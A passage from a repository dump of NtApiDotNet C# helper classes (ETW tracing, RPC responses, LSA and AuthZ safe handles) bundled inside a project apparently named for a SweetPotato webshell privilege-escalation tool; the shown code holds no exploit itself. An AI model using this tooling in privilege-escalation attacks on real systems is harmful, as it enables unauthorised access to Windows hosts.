        SymTagBlock = 6,
        SymTagData = 7,
        SymTagAnnotation = 8,
        SymTagLabel = 9,
        SymTagPublicSymbol = 10,
        SymTagUDT = 11,
        SymTagEnum = 12,
        SymTagFunctionType = 13,
        SymTagPointerType = 14,
        SymTagArrayType = 15,
        SymTagBaseType = 16,
        SymTagTypedef = 17,
        SymTagBaseClass = 18,
        SymTagFriend = 19,
        SymTagFunctionArgType = 20,
        SymTagFuncDebugStart = 21,
        SymTagFuncDebugEnd = 22,
        SymTagUsingNamespace = 23,
        SymTagVTableShape = 24,
        SymTagVTable = 25,
        SymTagCustom = 26,
        SymTagThunk = 27,
        SymTagCustomType = 28,
        SymTagManagedType = 29,
        SymTagDimension = 30
    }
}
57 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/SymbolInformationType.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Enumeration for symbol type information.
    /// </summary>
    public enum SymbolInformationType
    {
        /// <summary>
        /// None.
        /// </summary>
        None = 0,

        /// <summary>
        /// A user-defined type (UDT).
        /// </summary>
        UserDefinedType = 1,

        /// <summary>
        /// Enumerated type.
        /// </summary>
        EnumeratedType = 2,

        /// <summary>
        /// A base type.
        /// </summary>
        BaseType = 3,

        /// <summary>
        /// Undefined.
        /// </summary>
        UndefinedType = 4,
    }
}
44 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/TI_FINDCHILDREN_PARAMS.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System.Runtime.InteropServices;
16 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Fixed header used when asking for the children of a symbol.
    /// </summary>
    // NOTE(review): DataStart is a project attribute naming the ChildId field;
    // presumably it marks where variable-length data begins in the buffer.
    // Confirm against its definition, and that the buffer is sized from Count.
    [StructLayout(LayoutKind.Sequential)]
    [DataStart("ChildId")]
    internal struct TI_FINDCHILDREN_PARAMS
    {
        // Number of children.
        public int Count;

        // Start index.
        public int Start;

        // First child id slot.
        public int ChildId;
    }
}
27 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/TypeInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Symbol information for a type. Adds no members of its own; it serves as
    /// the common base for the more specific type-information classes.
    /// </summary>
    public class TypeInformation : SymbolInformation
    {
        /// <summary>
        /// Forward every argument unchanged to the base symbol constructor.
        /// </summary>
        internal TypeInformation(
            SymTagEnum tag,
            long size,
            int type_index,
            SymbolLoadedModule module,
            string name)
            : base(tag, size, type_index, module, name)
        {
            // Nothing to initialise beyond the base class.
        }
    }
}
28 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Debugger/UdtKind.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32.Debugger
{
    /// <summary>
    /// Kind of a user-defined type (UDT).
    /// </summary>
    internal enum UdtKind
    {
        UdtStruct = 0,
        UdtClass = 1,
        UdtUnion = 2,
        UdtInterface = 3
    }
}
25 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EtwServiceTriggerInformation.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016, 2017 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
namespace NtApiDotNet.Win32
{
#pragma warning disable 1591
    /// <summary>
    /// Service trigger information for a trigger keyed on an event trace
    /// provider, identified by the trigger's SubType.
    /// </summary>
    public class EtwServiceTriggerInformation : ServiceTriggerInformation
    {
        /// <summary>
        /// Security descriptor queried for the provider at construction time.
        /// Stays null when the query does not succeed.
        /// </summary>
        public SecurityDescriptor SecurityDescriptor { get; }

        internal EtwServiceTriggerInformation(SERVICE_TRIGGER trigger)
            : base(trigger)
        {
            // Query without throwing; a failed query leaves the property null.
            var query = EventTracing.QueryTraceSecurity(SubType, false);
            if (!query.IsSuccess)
            {
                return;
            }

            SecurityDescriptor = query.Result;
        }

        /// <summary>
        /// Register against the SubType provider and write one event. The
        /// registration is disposed when the write completes or throws.
        /// </summary>
        public override void Trigger()
        {
            using (var registration = EventTracing.Register(SubType))
            {
                registration.Write();
            }
        }

        /// <summary>
        /// Defers to the base class string form.
        /// </summary>
        public override string ToString() => base.ToString();
    }
#pragma warning restore
}
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EventTrace.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Win32
{
    /// <summary>
    /// Simple class for an event trace registration, wrapping the raw
    /// registration handle.
    /// </summary>
    public sealed class EventTrace : IDisposable
    {
        // Raw registration handle supplied at construction. There is no
        // finalizer, so the registration is released only through Dispose.
        private readonly long _handle;

        internal EventTrace(long handle)
        {
            _handle = handle;
        }

        /// <summary>
        /// Write an empty event (Id 1, Level 4, no payload). A failed write is
        /// converted to an exception by ToNtException.
        /// </summary>
        public void Write()
        {
            var descriptor = new EVENT_DESCRIPTOR
            {
                Id = 1,
                Level = 4
            };

            var result = Win32NativeMethods.EventWrite(_handle, ref descriptor, 0, null);
            result.ToNtException();
        }

        /// <summary>
        /// Unregister the handle. The native return value is ignored, so a
        /// failed or repeated unregister is not reported.
        /// </summary>
        public void Dispose()
        {
            Win32NativeMethods.EventUnregister(_handle);
        }
    }
}
53 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/EventTraceProvider.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 |
namespace NtApiDotNet.Win32
{
    /// <summary>
    /// Class to represent an Event Trace Provider.
    /// </summary>
    public sealed class EventTraceProvider
    {
        /// <summary>
        /// The ID of the provider.
        /// </summary>
        public Guid Id { get; }

        /// <summary>
        /// The name of the provider. Providers built from an ID alone use the
        /// ID's string form.
        /// </summary>
        public string Name { get; }

        /// <summary>
        /// Whether the provider is defined as an XML file or a MOF.
        /// </summary>
        public bool FromXml { get; }

        /// <summary>
        /// The provider security descriptor (only available as admin). Holds
        /// the default value when the query fails.
        /// </summary>
        public SecurityDescriptor SecurityDescriptor { get; }

        internal EventTraceProvider(Guid id)
            : this(id, id.ToString(), false)
        {
        }

        internal EventTraceProvider(Guid id, string name, bool from_xml)
        {
            this.Id = id;
            this.Name = name;
            this.FromXml = from_xml;

            // Queried without throwing, so callers must allow for a missing
            // descriptor.
            var security_query = EventTracing.QueryTraceSecurity(this.Id, false);
            this.SecurityDescriptor = security_query.GetResultOrDefault();
        }
    }
}
55 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/Rpc/RpcClientResponse.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Ndr;
16 | using NtApiDotNet.Ndr.Marshal;
17 | using System.Collections.Generic;
18 | using System.Linq;
19 |
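namespace NtApiDotNet.Win32.Rpc
{
    /// <summary>
    /// Response data from an RPC client call.
    /// </summary>
    public sealed class RpcClientResponse
    {
        /// <summary>
        /// The marshaled NDR data from the response.
        /// </summary>
        // Stored by reference, not copied.
        public byte[] NdrBuffer { get; }

        /// <summary>
        /// Any object handles returned in the response. (only for ALPC).
        /// </summary>
        // The listing showed IEnumerable and List with no type argument, which
        // does not compile; NtObject is restored as the element type, inferred
        // from the DuplicateObject call below.
        public IEnumerable<NtObject> Handles { get; }

        /// <summary>
        /// Indicates the NDR data representation for the response.
        /// </summary>
        public NdrDataRepresentation DataRepresentation { get; }

        /// <summary>
        /// Create the response from a buffer and the handles that came with it.
        /// </summary>
        /// <param name="ndr_buffer">The marshaled NDR data.</param>
        /// <param name="handles">Handles received with the response; must not be null.</param>
        internal RpcClientResponse(byte[] ndr_buffer, IEnumerable<NtObject> handles)
        {
            NdrBuffer = ndr_buffer;

            // Each handle is duplicated, so this object holds its own copies
            // independent of the caller's.
            // NOTE(review): the class is not IDisposable, so nothing visible
            // here closes the duplicates. Confirm the consumer disposes them.
            Handles = new List<NtObject>(handles.Select(o => o.DuplicateObject()));
            DataRepresentation = new NdrDataRepresentation();
        }
    }
}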
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuditBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
namespace NtApiDotNet.Win32.SafeHandles
{
    /// <summary>
    /// Safe buffer whose memory is released with AuditFree.
    /// </summary>
    internal class SafeAuditBuffer : SafeBuffer
    {
        /// <summary>
        /// Create an owning wrapper with no handle set yet.
        /// </summary>
        public SafeAuditBuffer() : base(true)
        {
        }

        /// <summary>
        /// Wrap an existing pointer.
        /// </summary>
        /// <param name="handle">The native pointer to wrap.</param>
        /// <param name="owns_handle">True if this wrapper frees the memory on release.</param>
        public SafeAuditBuffer(IntPtr handle, bool owns_handle)
            : base(owns_handle)
        {
            SetHandle(handle);
        }

        /// <summary>
        /// Only a null pointer counts as invalid.
        /// </summary>
        public override bool IsInvalid => handle == IntPtr.Zero;

        /// <summary>
        /// Free the buffer. Always reports success, whatever AuditFree did.
        /// </summary>
        protected override bool ReleaseHandle()
        {
            SecurityNativeMethods.AuditFree(handle);
            return true;
        }
    }
}
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuthZClientContextHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
namespace NtApiDotNet.Win32.SafeHandles
{
    /// <summary>
    /// Safe handle for an AuthZ client context, released with AuthzFreeContext.
    /// </summary>
    internal class SafeAuthZClientContextHandle : SafeHandle
    {
        /// <summary>
        /// Create an owning wrapper with no handle set yet.
        /// </summary>
        public SafeAuthZClientContextHandle()
            : base(IntPtr.Zero, true)
        {
        }

        /// <summary>
        /// Wrap an existing context handle.
        /// </summary>
        /// <param name="handle">The native handle to wrap.</param>
        /// <param name="owns_handle">True if this wrapper frees the context on release.</param>
        public SafeAuthZClientContextHandle(IntPtr handle, bool owns_handle)
            : base(IntPtr.Zero, owns_handle)
        {
            SetHandle(handle);
        }

        /// <summary>
        /// Only a zero handle counts as invalid.
        /// </summary>
        public override bool IsInvalid => handle == IntPtr.Zero;

        /// <summary>
        /// Free the context and return the native call's result.
        /// </summary>
        protected override bool ReleaseHandle() => SecurityNativeMethods.AuthzFreeContext(handle);
    }
}
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeAuthZResourceManagerHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
namespace NtApiDotNet.Win32.SafeHandles
{
    /// <summary>
    /// Safe handle for an AuthZ resource manager, released with
    /// AuthzFreeResourceManager.
    /// </summary>
    internal class SafeAuthZResourceManagerHandle : SafeHandle
    {
        /// <summary>
        /// Create an owning wrapper with no handle set yet.
        /// </summary>
        public SafeAuthZResourceManagerHandle()
            : base(IntPtr.Zero, true)
        {
        }

        /// <summary>
        /// Wrap an existing resource manager handle.
        /// </summary>
        /// <param name="handle">The native handle to wrap.</param>
        /// <param name="owns_handle">True if this wrapper frees the resource manager on release.</param>
        public SafeAuthZResourceManagerHandle(IntPtr handle, bool owns_handle)
            : base(IntPtr.Zero, owns_handle)
        {
            SetHandle(handle);
        }

        /// <summary>
        /// Only a zero handle counts as invalid.
        /// </summary>
        public override bool IsInvalid => handle == IntPtr.Zero;

        /// <summary>
        /// Free the resource manager and return the native call's result.
        /// </summary>
        protected override bool ReleaseHandle() => SecurityNativeMethods.AuthzFreeResourceManager(handle);
    }
}
48 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeCoTaskMemHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.SafeHandles
{
    /// <summary>
    /// Safe handle for memory from the COM task allocator, released with
    /// Marshal.FreeCoTaskMem.
    /// </summary>
    internal sealed class SafeCoTaskMemHandle : SafeHandle
    {
        /// <summary>
        /// Create an owning wrapper with no pointer set yet.
        /// </summary>
        public SafeCoTaskMemHandle()
            : base(IntPtr.Zero, true)
        {
        }

        /// <summary>
        /// Wrap an existing pointer.
        /// </summary>
        /// <param name="handle">The pointer to wrap.</param>
        /// <param name="owns_handle">True if this wrapper frees the memory on release.</param>
        public SafeCoTaskMemHandle(IntPtr handle, bool owns_handle)
            : base(IntPtr.Zero, owns_handle)
        {
            SetHandle(handle);
        }

        /// <summary>
        /// Only a null pointer counts as invalid.
        /// </summary>
        public override bool IsInvalid => handle == IntPtr.Zero;

        /// <summary>
        /// Free the memory. Always reports success.
        /// </summary>
        protected override bool ReleaseHandle()
        {
            Marshal.FreeCoTaskMem(handle);
            return true;
        }
    }
}
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLocalAllocBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2019 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using System;
16 | using System.Runtime.InteropServices;
17 |
namespace NtApiDotNet.Win32.SafeHandles
{
    /// <summary>
    /// Safe buffer whose memory is released with LocalFree.
    /// </summary>
    internal sealed class SafeLocalAllocBuffer : SafeBuffer
    {
        /// <summary>
        /// Create an owning wrapper with no pointer set yet.
        /// </summary>
        public SafeLocalAllocBuffer() : base(true)
        {
        }

        /// <summary>
        /// Wrap an existing pointer.
        /// </summary>
        /// <param name="handle">The native pointer to wrap.</param>
        /// <param name="owns_handle">True if this wrapper frees the memory on release.</param>
        public SafeLocalAllocBuffer(IntPtr handle, bool owns_handle)
            : base(owns_handle)
        {
            SetHandle(handle);
        }

        /// <summary>
        /// Only a null pointer counts as invalid.
        /// </summary>
        public override bool IsInvalid => handle == IntPtr.Zero;

        /// <summary>
        /// Free the memory; success is reported when LocalFree returns null.
        /// </summary>
        protected override bool ReleaseHandle()
        {
            IntPtr remaining = Win32NativeMethods.LocalFree(handle);
            return remaining == IntPtr.Zero;
        }
    }
}
46 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using NtApiDotNet.Win32.Security.Native;
17 | using NtApiDotNet.Win32.Security.Policy;
18 | using System;
19 |
20 | namespace NtApiDotNet.Win32.SafeHandles
21 | {
/// <summary>
/// Safe handle for an LSA policy handle, closed with LsaClose.
/// </summary>
internal class SafeLsaHandle : SafeHandleZeroOrMinusOneIsInvalid
{
    /// <summary>
    /// Creates an empty handle that owns whatever value is stored in it later.
    /// </summary>
    public SafeLsaHandle()
        : base(true)
    {
    }

    /// <summary>
    /// Wraps an existing handle value.
    /// </summary>
    /// <param name="handle">The handle to wrap.</param>
    /// <param name="ownsHandle">True if the handle should be closed on release.</param>
    public SafeLsaHandle(IntPtr handle, bool ownsHandle)
        : base(ownsHandle)
    {
        SetHandle(handle);
    }

    /// <summary>
    /// Closes the handle and reports whether LsaClose succeeded.
    /// </summary>
    protected override bool ReleaseHandle()
    {
        return SecurityNativeMethods.LsaClose(handle).IsSuccess();
    }

    /// <summary>
    /// Opens an LSA policy handle.
    /// </summary>
    /// <param name="system_name">Target system name; null is passed through to LsaOpenPolicy as a null string.</param>
    /// <param name="desired_access">Access rights requested on the policy object.</param>
    /// <param name="throw_on_error">Forwarded to CreateResult to select throwing or returning the error.</param>
    /// <returns>The result wrapping the opened policy handle.</returns>
    // NOTE(review): the return type appears as a bare NtResult in this listing; a generic
    // argument may have been lost in extraction - confirm against the original file.
    internal static NtResult OpenPolicy(string system_name, LsaPolicyAccessRights desired_access, bool throw_on_error)
    {
        UnicodeString target = null;
        if (system_name != null)
        {
            target = new UnicodeString(system_name);
        }

        var status = SecurityNativeMethods.LsaOpenPolicy(target, new ObjectAttributes(),
            desired_access, out SafeLsaHandle policy);
        return status.CreateResult(throw_on_error, () => policy);
    }
}
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaLogonHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using Microsoft.Win32.SafeHandles;
16 | using NtApiDotNet.Win32.Security.Native;
17 | using System;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
/// <summary>
/// Safe handle for an LSA logon connection, released with LsaDeregisterLogonProcess.
/// </summary>
internal class SafeLsaLogonHandle : SafeHandleZeroOrMinusOneIsInvalid
{
    /// <summary>
    /// Creates an empty handle that owns whatever value is stored in it later.
    /// </summary>
    public SafeLsaLogonHandle()
        : base(true)
    {
    }

    /// <summary>
    /// Wraps an existing handle value.
    /// </summary>
    /// <param name="handle">The handle to wrap.</param>
    /// <param name="ownsHandle">True if the connection should be deregistered on release.</param>
    public SafeLsaLogonHandle(IntPtr handle, bool ownsHandle)
        : base(ownsHandle)
    {
        SetHandle(handle);
    }

    /// <summary>
    /// Deregisters the logon connection and reports whether the call succeeded.
    /// </summary>
    protected override bool ReleaseHandle()
    {
        return SecurityNativeMethods.LsaDeregisterLogonProcess(handle).IsSuccess();
    }

    /// <summary>
    /// Connects to LSA, first as a registered logon process and, if that fails, as an untrusted client.
    /// </summary>
    /// <param name="throw_on_error">Applies only to the untrusted fallback; forwarded to CreateResult.</param>
    /// <returns>The result wrapping the connection handle.</returns>
    // NOTE(review): the failure status of the registered attempt is dropped, so a caller cannot
    // tell which kind of connection it received. The registered path normally requires
    // SeTcbPrivilege, so the two outcomes differ in trust level - confirm callers do not assume one.
    internal static NtResult Connect(bool throw_on_error)
    {
        var registered = SecurityNativeMethods.LsaRegisterLogonProcess(
            new LsaString("NtApiDotNet"), out SafeLsaLogonHandle hlsa, out uint _);
        if (registered.IsSuccess())
        {
            return hlsa.CreateResult();
        }

        return SecurityNativeMethods.LsaConnectUntrusted(out hlsa).CreateResult(throw_on_error, () => hlsa);
    }
}
46 | }
47 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaMemoryBuffer.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 |
18 | namespace NtApiDotNet.Win32.SafeHandles
19 | {
/// <summary>
/// Safe buffer for memory returned by LSA, released with LsaFreeMemory.
/// </summary>
internal class SafeLsaMemoryBuffer : SafeBufferGeneric
{
    /// <summary>
    /// Creates an empty, zero-length buffer that owns any pointer stored in it later.
    /// </summary>
    public SafeLsaMemoryBuffer()
        : base(IntPtr.Zero, 0, true)
    {
    }

    /// <summary>
    /// A null pointer is treated as invalid.
    /// </summary>
    public override bool IsInvalid => handle == IntPtr.Zero;

    /// <summary>
    /// Frees the memory and reports whether LsaFreeMemory succeeded.
    /// </summary>
    protected override bool ReleaseHandle()
    {
        var status = SecurityNativeMethods.LsaFreeMemory(handle);
        return status.IsSuccess();
    }
}
40 | }
41 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeHandles/SafeLsaReturnBufferHandle.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2020 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
12 | // See the License for the specific language governing permissions and
13 | // limitations under the License.
14 |
15 | using NtApiDotNet.Win32.Security.Native;
16 | using System;
17 | using System.Runtime.InteropServices;
18 |
19 | namespace NtApiDotNet.Win32.SafeHandles
20 | {
/// <summary>
/// Safe buffer for an LSA return buffer, released with LsaFreeReturnBuffer.
/// </summary>
internal class SafeLsaReturnBufferHandle : SafeBuffer
{
    /// <summary>
    /// Creates an empty (invalid) buffer that owns any pointer stored in it later.
    /// </summary>
    public SafeLsaReturnBufferHandle()
        : base(true)
    {
    }

    /// <summary>
    /// Wraps an existing pointer.
    /// </summary>
    /// <param name="handle">The pointer to wrap.</param>
    /// <param name="owns_handle">True if the buffer should be freed on release.</param>
    public SafeLsaReturnBufferHandle(IntPtr handle, bool owns_handle)
        : base(owns_handle)
    {
        SetHandle(handle);
    }

    /// <summary>
    /// A null pointer is treated as invalid.
    /// </summary>
    public override bool IsInvalid => handle == IntPtr.Zero;

    /// <summary>
    /// Frees the buffer. The native return value is ignored and success is always reported.
    /// </summary>
    protected override bool ReleaseHandle()
    {
        SecurityNativeMethods.LsaFreeReturnBuffer(handle);
        return true;
    }
}
48 | }
49 |
--------------------------------------------------------------------------------
/SweetPotato-Webshell-new/NtApiDotNet/Win32/SafeWin32Exception.cs:
--------------------------------------------------------------------------------
1 | // Copyright 2016 Google Inc. All Rights Reserved.
2 | //
3 | // Licensed under the Apache License, Version 2.0 (the "License");
4 | // you may not use this file except in compliance with the License.
5 | // You may obtain a copy of the License at
6 | //
7 | // http://www.apache.org/licenses/LICENSE-2.0
8 | //
9 | // Unless required by applicable law or agreed to in writing, software
10 | // distributed under the License is distributed on an "AS IS" BASIS,
